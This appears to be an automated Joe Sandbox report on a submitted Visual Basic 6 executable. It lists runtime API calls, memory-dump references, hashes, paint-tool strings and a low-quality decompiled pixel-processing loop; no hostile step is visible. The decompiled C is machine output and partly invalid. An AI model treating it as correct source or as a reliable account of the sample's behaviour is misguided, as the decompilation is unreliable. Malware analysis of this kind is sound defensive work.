0x004526f8
0x00452700
0x00452702
0x00452704
0x00452713
0x00452713
0x00452719
0x0045271f
0x00452724
0x00452727
0x00452728
0x0045272c
0x00452731
0x00452734
0x0045273a
0x0045273d
0x00452740
0x00452745
0x00452748
0x0045274e
0x00452753
0x00452755
0x00452757
0x0045275c
0x0045275f
0x00452767
0x00452769
0x0045276b
0x0045277a
0x0045277a
0x00452780
0x00452785
0x0045278b
0x0045278e
0x00452792
0x00452797
0x0045279a
0x004527a0
0x004527a3
0x004527a6
0x004527a9
0x004527ab
0x004527ae
0x004527b4
0x004527b9
0x004527bb
0x004527bd
0x004527c2
0x004527c5
0x004527cd
0x004527cf
0x004527d1
0x004527e0
0x004527e0
0x004527e6
0x004527ec
0x004527f1
0x004527f4
0x004527f5
0x004527f9
0x004527fe
0x00452801
0x00452807
0x0045280a
0x0045280c
0x0045280f
0x00452812
0x00452815
0x00452817
0x0045281a
0x0045281c
0x0045281f
0x00452821
0x00452824
0x00452826
0x00452829
0x0045282b
0x00452830
0x00452832
0x00452838
0x0045283e
0x00452844
0x00452851
0x0045285b
0x00452861
0x00452867
0x00452853
0x00452853
0x00452853
0x0045286c
0x00452870
0x00401e9c
0x00452876
0x00452876
0x0045287c
0x00452881
0x00452884
0x0045288a
0x0045288f
0x00452891
0x00452893
0x00452898
0x0045289b
0x004528a3
0x004528a5
0x004528a7
0x004528b6
0x004528b6
0x004528bc
0x004528c2
0x004528c7
0x004528ce
0x004528d4
0x004528d9
0x004528df
0x004528e2
0x004528e4
0x004528ea
0x004528f1
0x00000000
0x004528f1
0x00452870
0x004528fc
0x00452901
0x00452907
0x0045290a
0x0045290d
0x00452910
0x00452913
0x00452914
0x00452915
0x00452915
0x00452915
0x00452917
0x0045291c
0x00452922
0x00452927
0x0045292d
0x0045292f
0x00452932
0x00452935
0x00452938
0x0045293b
0x0045293e
0x00452941
0x00452943
0x00452946
0x0045294c
0x00452951
0x00452954
0x0045295a
0x0045295d
0x0045295f
0x00452965
0x0045296c
0x0045296c
0x00452977
0x0045297a
0x00452980
0x00452985
0x00452987
0x0045298a
0x0045298d
0x00452995
0x00452997
0x00452999
0x004529a8
0x004529a8
0x004529ae
0x004529b1
0x004529b3
0x004529b6
0x004529bb
0x004529bd
0x004529c2
0x004529c4
0x004529c7
0x004529ca
0x004529cc
0x004529cf
0x004529d2
0x004529d5
0x004529db
0x004529e0
0x004529e3
0x004529e9
0x004529ec
0x004529ee
0x004529f5
0x004529f6
0x00000000

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 004524EC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 00452513
__vbaSetSystemError.MSVBVM60(?,-00000001,-00000001), ref: 00452534
__vbaFreeObj.MSVBVM60 ref: 00452543
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452553
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 0045257A
__vbaSetSystemError.MSVBVM60(?,00000000,-00000001), ref: 0045259A
__vbaFreeObj.MSVBVM60 ref: 004525A9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004525B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 004525E0
__vbaSetSystemError.MSVBVM60(?,00000001,-00000001), ref: 00452601
__vbaFreeObj.MSVBVM60 ref: 00452610
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452620
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 00452647
__vbaSetSystemError.MSVBVM60(?,-00000001,00000000), ref: 00452667
__vbaFreeObj.MSVBVM60 ref: 00452676
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452686
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 004526AD
__vbaSetSystemError.MSVBVM60(?,00000001,00000000), ref: 004526CD
__vbaFreeObj.MSVBVM60 ref: 004526DC
__vbaObjSet.MSVBVM60(?,00000000), ref: 004526EC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 00452713
__vbaSetSystemError.MSVBVM60(?,-00000001,00000001), ref: 00452734
__vbaFreeObj.MSVBVM60 ref: 00452743
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452753
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 0045277A
__vbaSetSystemError.MSVBVM60(?,00000000,00000001), ref: 0045279A
__vbaFreeObj.MSVBVM60 ref: 004527A9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004527B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 004527E0
__vbaSetSystemError.MSVBVM60(?,00000001,00000001), ref: 00452801
__vbaFreeObj.MSVBVM60 ref: 0045280A
_adj_fdiv_m64.MSVBVM60 ref: 00452867
__vbaFpI4.MSVBVM60 ref: 00452876
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045288F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 004528B6
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 004528D9
__vbaFreeObj.MSVBVM60 ref: 004528E2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452951
__vbaLateIdSt.MSVBVM60(00000000), ref: 00452954
__vbaFreeObj.MSVBVM60 ref: 0045295D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452985
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000264), ref: 004529A8
__vbaFreeObj.MSVBVM60 ref: 004529B1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004529E0
__vbaLateIdSt.MSVBVM60(00000000), ref: 004529E3
__vbaFreeObj.MSVBVM60 ref: 004529EC

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorSystem$LateNew2$List_adj_fdiv_m64
String ID:
API String ID: 856715139-0
Opcode ID: ac719e094ba6881b1b3ec85b93bfc6d2125cb68362dbd49bf0ee9927c6733c6d
Instruction ID: 345fc9de21094ba113dff1fbbf3a2af29f522297bd8f2963417a5bd1de77f2b1
Opcode Fuzzy Hash: ac719e094ba6881b1b3ec85b93bfc6d2125cb68362dbd49bf0ee9927c6733c6d
Instruction Fuzzy Hash: B9124D70A00309EFDB04EFA5DD88EAEB7B9FF49700F10852AE445A72A1DB74A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00461350, Relevance: 63.2, APIs: 11, Strings: 25, Instructions: 159COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(660DA274,00401240,?), ref: 00461467
__vbaNew2.MSVBVM60(00405960,0046C010,660DA274,00401240,?), ref: 00461480
__vbaObjSet.MSVBVM60(?,00000000), ref: 004614A7
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 004614AE
__vbaCastObjVar.MSVBVM60(00000000), ref: 004614B8
__vbaObjSet.MSVBVM60(?,00000000), ref: 004614C3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409898,00000024), ref: 004614EF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098A8,00000080), ref: 00461519
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0046152D
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0046153C
__vbaFreeStr.MSVBVM60(0046157E), ref: 00461577

Strings

Choose Color, xrefs: 00461458
Pencil, xrefs: 004613A5
Diagonal Line (\), xrefs: 004613E1
Polygon, xrefs: 0046140B
Star, xrefs: 004613AF
Filled Rect, xrefs: 00461420
Cross, xrefs: 004613CD
Erase, xrefs: 00461435
Cut, xrefs: 00461451
Hook, xrefs: 00461443
Horizontal Line, xrefs: 004613B9
Straight Line, xrefs: 004613FD
Replace Color, xrefs: 0046145F
Diagonal Cross, xrefs: 004613D7
Text, xrefs: 004613F6
Brush, xrefs: 00461404
Vertical Line, xrefs: 004613C3
Copy, xrefs: 0046144A
Userdefined Polygon, xrefs: 004613EF
Hammer, xrefs: 0046143C
Circle, xrefs: 00461419
Rect, xrefs: 00461412
Fill Region, xrefs: 0046142E
Diagonal Line (/), xrefs: 004613E8
Filled Circle, xrefs: 00461427

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresultList$CallCastCopyLateNew2
String ID: Brush$Choose Color$Circle$Copy$Cross$Cut$Diagonal Cross$Diagonal Line (/)$Diagonal Line (\)$Erase$Fill Region$Filled Circle$Filled Rect$Hammer$Hook$Horizontal Line$Pencil$Polygon$Rect$Replace Color$Star$Straight Line$Text$Userdefined Polygon$Vertical Line
API String ID: 1857520127-914636621
Opcode ID: 72dc854ebd442790f14671cf5411d8f0ad965654f01e28329813d2e4e702bf56
Instruction ID: a0c4c950bde89eb32d74b269590a328dae9464586d597915e489a2cbcbe6533b
Opcode Fuzzy Hash: 72dc854ebd442790f14671cf5411d8f0ad965654f01e28329813d2e4e702bf56
Instruction Fuzzy Hash: E3516170A00345EBCF00DB508C589AAB669FB84748F28C537E502B76A5EB7C5816DF9F

Uniqueness

Uniqueness Score: -1.00%

Function 00467290, Relevance: 60.5, APIs: 40, Instructions: 479COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 004672FC
_adj_fdiv_m64.MSVBVM60 ref: 00467321
_adj_fdiv_m64.MSVBVM60(?,00000000,00000000,00000000,00000000), ref: 0046736F
_adj_fdiv_m64.MSVBVM60(?,?,00000000,00000000,00000000,00000000), ref: 004673AB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000274,?,?,?,00000000,00000000,00000000,00000000), ref: 004673DF
__vbaFreeObj.MSVBVM60(?,?,?,00000000,00000000,00000000,00000000), ref: 004673EE
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 004673FE
_adj_fdiv_m64.MSVBVM60(?,?,?,00000000,00000000,00000000,00000000), ref: 00467423
_adj_fdiv_m64.MSVBVM60(00000000,41400000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 0046746D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,0000027C,?,00000006,?,40800000,00000000,41400000,00000000,?,?,?,00000000,00000000), ref: 004674A9
__vbaFreeObj.MSVBVM60(?,00000006,?,40800000,00000000,41400000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 004674B2
__vbaObjSet.MSVBVM60(?,00000000,?,00000006,?,40800000,00000000,41400000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 004674C2
_adj_fdiv_m64.MSVBVM60(?,00000006,?,40800000,00000000,41400000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 004674E7
_adj_fdiv_m64.MSVBVM60(00000000,42B20000,00000000,?,00000006,?,40800000,00000000,41400000,00000000,?,?,?,00000000,00000000,00000000), ref: 00467531
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,0000027C,?,00000006,?,42A20000,00000000,42B20000,00000000,?,00000006,?,40800000,00000000), ref: 0046756D
__vbaFreeObj.MSVBVM60(?,00000006,?,42A20000,00000000,42B20000,00000000,?,00000006,?,40800000,00000000,41400000,00000000), ref: 00467576
__vbaObjSet.MSVBVM60(?,00000000,?,00000006,?,42A20000,00000000,42B20000,00000000,?,00000006,?,40800000,00000000,41400000,00000000), ref: 00467586
_adj_fdiv_m64.MSVBVM60(?,00000006,?,42A20000,00000000,42B20000,00000000,?,00000006,?,40800000,00000000,41400000,00000000), ref: 004675AB
_adj_fdiv_m64.MSVBVM60(00000000,00000000,?,00000006,?,42A20000,00000000,42B20000,00000000,?,00000006,?,40800000,00000000,41400000,00000000), ref: 004675F0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,0000027C,?,00000006,42A20000,?,42B20000,00000000,00000000,?,00000006,?,42A20000,00000000), ref: 00467631
__vbaFreeObj.MSVBVM60(?,00000006,42A20000,?,42B20000,00000000,00000000,?,00000006,?,42A20000,00000000,42B20000,00000000,?,00000006), ref: 0046763A
__vbaObjSet.MSVBVM60(?,00000000,?,00000006,42A20000,?,42B20000,00000000,00000000,?,00000006,?,42A20000,00000000,42B20000,00000000), ref: 0046764A
_adj_fdiv_m64.MSVBVM60(?,00000006,42A20000,?,42B20000,00000000,00000000,?,00000006,?,42A20000,00000000,42B20000,00000000,?,00000006), ref: 0046766F
_adj_fdiv_m64.MSVBVM60(00000000,00000000,?,00000006,42A20000,?,42B20000,00000000,00000000,?,00000006,?,42A20000,00000000,42B20000,00000000), ref: 004676B4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,0000027C,?,00000006,40800000,?,41400000,00000000,00000000,?,00000006,42A20000,?,42B20000), ref: 004676F5
__vbaFreeObj.MSVBVM60(?,00000006,40800000,?,41400000,00000000,00000000,?,00000006,42A20000,?,42B20000,00000000,00000000,?,00000006), ref: 004676FE
__vbaObjSet.MSVBVM60(?,00000000,?,00000006,40800000,?,41400000,00000000,00000000,?,00000006,42A20000,?,42B20000,00000000,00000000), ref: 0046770E
_adj_fdiv_m64.MSVBVM60(?,00000006,40800000,?,41400000,00000000,00000000,?,00000006,42A20000,?,42B20000,00000000,00000000,?,00000006), ref: 00467733
_adj_fdiv_m64.MSVBVM60(00000000,?,?,000000FF,?,00000006,40800000,?,41400000,00000000,00000000,?,00000006,42A20000,?,42B20000), ref: 00467787
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,0000027C,?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000), ref: 004677BE
__vbaFreeObj.MSVBVM60(?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000,00000000,00000000,?,00000006), ref: 004677C7
__vbaObjSet.MSVBVM60(?,00000000,?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000,00000000,00000000), ref: 004677D7
__vbaObjSet.MSVBVM60(?,00000000,?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000,00000000,00000000), ref: 004677EA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000), ref: 0046780D
__vbaObjSet.MSVBVM60(?,?,?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000,00000000,00000000), ref: 00467827
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000064,?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000), ref: 00467842
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,00000006,?,00000000,?,?,000000FF,?,00000006,40800000,?,41400000), ref: 00467856
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046786D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000278), ref: 0046788C
__vbaFreeObj.MSVBVM60 ref: 00467895

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$_adj_fdiv_m64$CheckHresult$Free$List
String ID:
API String ID: 3206913236-0
Opcode ID: cd9dd896bb24305f5b96ff46188336f030ecc8cabe1d1d064762540728a555a2
Instruction ID: 9b8e3244707d0e096d16a0ce50e8a12a6308c388be3e2df1d73d6182f76769bd
Opcode Fuzzy Hash: cd9dd896bb24305f5b96ff46188336f030ecc8cabe1d1d064762540728a555a2
Instruction Fuzzy Hash: C0024170904204EBDB10AFB0DD89BAE7B79FB18708F104569F586B61F1EB385891CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00458320, Relevance: 52.9, APIs: 35, Instructions: 378
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00458320(void* __ebx, void* __edi, void* __esi, void* __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed long long _v132;
				signed int _v136;
				signed long long _v144;
				signed int _v148;
				signed int _t129;
				signed int _t134;
				signed int _t135;
				void* _t136;
				void* _t138;
				intOrPtr _t139;

				_t139 = _t138 - 0xc;
				 *[fs:0x0] = _t139;
				_v16 = _t139 - 0x7c;
				_v12 = 0x4017e0;
				_t134 = _a4;
				_v8 = _t134 & 0x00000001;
				_t135 = _t134 & 0xfffffffe;
				_a4 = _t135;
				 *((intOrPtr*)( *_t135 + 4))(_t135, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t136);
				_v48 = 0;
				_v64 = 0;
				_v84 = 0;
				E00461600(__ebx, 0, _t135);
				_t129 =  *0x46c070; // 0x0
				 *0x46c068 = 0;
				_v104 = _t129;
				while(1) {
					__eax =  *0x46c068; // 0x0
					__ecx = _v104;
					if(__eax > _v104) {
						break;
					}
					__ecx =  *0x46c074; // 0x0
					 *0x46c06c = 0;
					_v112 = __ecx;
					while(1) {
						__edx = _v112;
						__eax =  *0x46c06c; // 0x0
						if(__eax > _v112) {
							break;
						}
						__eax =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v48;
						__eax =  *__ebx( &_v48,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v84;
						_v92 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v84);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v92;
							__imp____vbaHresultCheckObj(__eax, _v92, 0x40937c, 0xe0);
						}
						__eax =  *0x46c06c; // 0x0
						__ecx =  *0x46c068; // 0x0
						__edx = _v84;
						E00408D5C();
						_v88 = __eax;
						__imp____vbaSetSystemError(_v84, __ecx, __eax);
						__eax = _v88;
						__ecx =  &_v48;
						_v28 = _v88;
						__eax =  *__edi();
						__ecx =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__edx =  &_v48;
						__eax =  *__ebx( &_v48, _v88);
						__ecx =  *__eax;
						__edx =  &_v84;
						_v92 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v84);
						asm("fclex");
						if(__eax < 0) {
							__ecx = _v92;
							__imp____vbaHresultCheckObj(__eax, _v92, 0x40937c, 0xe0);
						}
						__eax =  *0x46c068; // 0x0
						__edx =  *0x46c06c; // 0x0
						__ecx = _v84;
						__eax = __eax + 1;
						E00408D5C();
						_v88 = __eax;
						__imp____vbaSetSystemError(_v84, __eax, __edx);
						__edx = _v88;
						__ecx =  &_v48;
						_v32 = _v88;
						 *__edi() =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v48;
						__eax =  *__ebx( &_v48,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v84;
						_v92 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v84);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v92;
							__imp____vbaHresultCheckObj(__eax, _v92, 0x40937c, 0xe0);
						}
						__ecx =  *0x46c068; // 0x0
						__eax =  *0x46c06c; // 0x0
						__edx = _v84;
						__ecx = __ecx - 1;
						E00408D5C();
						_v88 = __eax;
						__imp____vbaSetSystemError(_v84, __ecx, __eax);
						__eax = _v88;
						__ecx =  &_v48;
						_v36 = _v88;
						__eax =  *__edi();
						__ecx =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__edx =  &_v48;
						__eax =  *__ebx( &_v48, _v88);
						__ecx =  *__eax;
						__edx =  &_v84;
						_v92 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v84);
						asm("fclex");
						if(__eax < 0) {
							__ecx = _v92;
							__imp____vbaHresultCheckObj(__eax, _v92, 0x40937c, 0xe0);
						}
						__edx =  *0x46c06c; // 0x0
						__eax =  *0x46c068; // 0x0
						__ecx = _v84;
						E00408D5C();
						_v88 = __eax;
						__imp____vbaSetSystemError(_v84, __eax, __edx);
						__edx = _v88;
						__ecx =  &_v48;
						_v40 = _v88;
						 *__edi() =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v48;
						__eax =  *__ebx( &_v48,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v84;
						_v92 = __eax;
						__eax =  *((intOrPtr*)( *__eax + 0xe0))(__eax,  &_v84);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v92;
							__imp____vbaHresultCheckObj(__eax, _v92, 0x40937c, 0xe0);
						}
						__eax =  *0x46c06c; // 0x0
						__ecx =  *0x46c068; // 0x0
						__edx = _v84;
						__eax = __eax - 1;
						E00408D5C();
						_v88 = __eax;
						__imp____vbaSetSystemError(_v84, __ecx, __eax);
						__ecx =  &_v48;
						 *__edi() =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
						__ecx =  &_v48;
						__eax =  *__ebx( &_v48,  *__esi);
						__edx =  *__eax;
						__ecx =  &_v84;
						_v92 = __eax;
						__eax =  *((intOrPtr*)(__edx + 0xe0))(__eax,  &_v84);
						asm("fclex");
						if(__eax < 0) {
							__edx = _v92;
							__imp____vbaHresultCheckObj(__eax, __edx, 0x40937c, 0xe0);
						}
						__eax = _v28;
						__ecx = _v40;
						asm("cdq");
						__eax = _v28 ^ __edx;
						__eax = (_v28 ^ __edx) - __edx;
						__edx = _v32;
						_v124 = __eax;
						_v88 = _v88 + _v40;
						__ecx = _v36;
						asm("fild dword [ebp-0x78]");
						_v88 + _v40 + _v36 = _v88 + _v40 + _v36 + __edx;
						_v132 = __fp0;
						asm("cdq");
						__eax = _v88 + _v40 + _v36 + __edx ^ __edx;
						__eax = (_v88 + _v40 + _v36 + __edx ^ __edx) - __edx;
						_v136 = __eax;
						asm("fild dword [ebp-0x84]");
						_v144 = __fp0;
						__fp0 = _v144;
						if( *0x46c000 != 0) {
							_push( *0x4017dc);
							_push( *0x4017d8);
							L00401EB4();
						} else {
							__fp0 = __fp0 /  *0x4017d8;
						}
						asm("fsubr qword [ebp-0x80]");
						asm("fnstsw ax");
						if((__al & 0x0000000d) != 0) {
							return __imp____vbaFPException();
						} else {
							__imp____vbaFpI4();
							__edx =  *0x46c06c; // 0x0
							__ecx = _v84;
							__eax =  *0x46c068; // 0x0
							E00408D18();
							__imp____vbaSetSystemError(_v84, __eax, __edx, __eax);
							__ecx =  &_v48;
							__eax =  *__edi();
							__ecx =  *0x46c06c; // 0x0
							__eax = 1;
							 *0x46c06c = __ecx;
							continue;
						}
					}
					__eax =  *0x46c068; // 0x0
					__edx =  *0x46c070; // 0x0
					__esp = __esp - 0x10;
					__eax = __eax + __eax * 4;
					_t89 = __edx - 1; // -1
					__ecx = _t89;
					__eax = __eax + __eax * 4;
					__eax = __eax << 2;
					asm("cdq");
					_t93 = __eax % __ecx;
					__eax = __eax / __ecx;
					__edx = _t93;
					__edx = __esp;
					_v148 = __eax;
					__eax = 4;
					asm("fild dword [ebp-0x90]");
					 *__edx = 4;
					__eax = _v60;
					_v56 = __fp0;
					__ecx = _v56;
					 *(__edx + 4) = _v60;
					__eax = _v52;
					 *(__edx + 8) = _v56;
					__ecx =  *__esi;
					 *((intOrPtr*)(__edx + 0xc)) = _v52;
					__eax =  *((intOrPtr*)( *__esi + 0x488))(__esi, 5);
					__edx =  &_v48;
					__eax =  *__ebx( &_v48, _v52);
					__imp____vbaLateIdSt(_v52);
					__ecx =  &_v48;
					__eax =  *__edi();
					__ecx =  *0x46c068; // 0x0
					__eax = 1;
					 *0x46c068 = __ecx;
				}
				__esp = __esp - 0x10;
				__ecx = 4;
				__edx = __esp;
				__eax = 0;
				 *__edx = 4;
				__ecx = _v60;
				 *(__edx + 4) = _v60;
				__ecx =  *__esi;
				 *(__edx + 8) = 0;
				__eax = _v52;
				 *((intOrPtr*)(__edx + 0xc)) = _v52;
				__eax =  *((intOrPtr*)( *__esi + 0x488))(__esi, 5);
				__edx =  &_v48;
				__eax =  *__ebx( &_v48, _v52);
				__imp____vbaLateIdSt(_v52);
				__ecx =  &_v48;
				 *__edi() =  *__esi;
				__eax =  *((intOrPtr*)( *__esi + 0x334))(__esi);
				__ecx =  &_v48;
				__esi =  *__ebx( &_v48,  *__esi);
				__edx =  *__esi;
				__eax =  *((intOrPtr*)( *__esi + 0x264))(__esi);
				asm("fclex");
				if(__eax < 0) {
					__imp____vbaHresultCheckObj(__eax, __esi, 0x40937c, 0x264);
				}
				__ecx =  &_v48;
				__eax =  *__edi();
				_v8 = 0;
				asm("wait");
				_push(0x4587a9);
				return __eax;
			}

0x00458323
0x00458332
0x0045833f
0x00458342
0x00458349
0x00458351
0x00458354
0x00458358
0x0045835d
0x00458362
0x00458365
0x00458368
0x0045836b
0x00458370
0x0045837c
0x00458388
0x0045838b
0x0045838b
0x00458390
0x00458395
0x00000000
0x00000000
0x0045839b
0x004583a1
0x004583ab
0x004583ae
0x004583ae
0x004583b1
0x004583b8
0x00000000
0x00000000
0x004583be
0x004583c1
0x004583c7
0x004583cc
0x004583ce
0x004583d0
0x004583d5
0x004583d8
0x004583e0
0x004583e2
0x004583e4
0x004583f3
0x004583f3
0x004583f9
0x004583fe
0x00458404
0x0045840a
0x0045840f
0x00458412
0x00458418
0x0045841b
0x0045841e
0x00458421
0x00458423
0x00458426
0x0045842c
0x00458431
0x00458433
0x00458435
0x0045843a
0x0045843d
0x00458445
0x00458447
0x00458449
0x00458458
0x00458458
0x0045845e
0x00458463
0x00458469
0x0045846c
0x00458470
0x00458475
0x00458478
0x0045847e
0x00458481
0x00458484
0x00458489
0x0045848c
0x00458492
0x00458497
0x00458499
0x0045849b
0x004584a0
0x004584a3
0x004584ab
0x004584ad
0x004584af
0x004584be
0x004584be
0x004584c4
0x004584ca
0x004584cf
0x004584d2
0x004584d6
0x004584db
0x004584de
0x004584e4
0x004584e7
0x004584ea
0x004584ed
0x004584ef
0x004584f2
0x004584f8
0x004584fd
0x004584ff
0x00458501
0x00458506
0x00458509
0x00458511
0x00458513
0x00458515
0x00458524
0x00458524
0x0045852a
0x00458530
0x00458535
0x0045853c
0x00458541
0x00458544
0x0045854a
0x0045854d
0x00458550
0x00458555
0x00458558
0x0045855e
0x00458563
0x00458565
0x00458567
0x0045856c
0x0045856f
0x00458577
0x00458579
0x0045857b
0x0045858a
0x0045858a
0x00458590
0x00458595
0x0045859b
0x0045859e
0x004585a2
0x004585a7
0x004585aa
0x004585b0
0x004585b5
0x004585b8
0x004585be
0x004585c3
0x004585c5
0x004585c7
0x004585cc
0x004585cf
0x004585d7
0x004585d9
0x004585db
0x004585ea
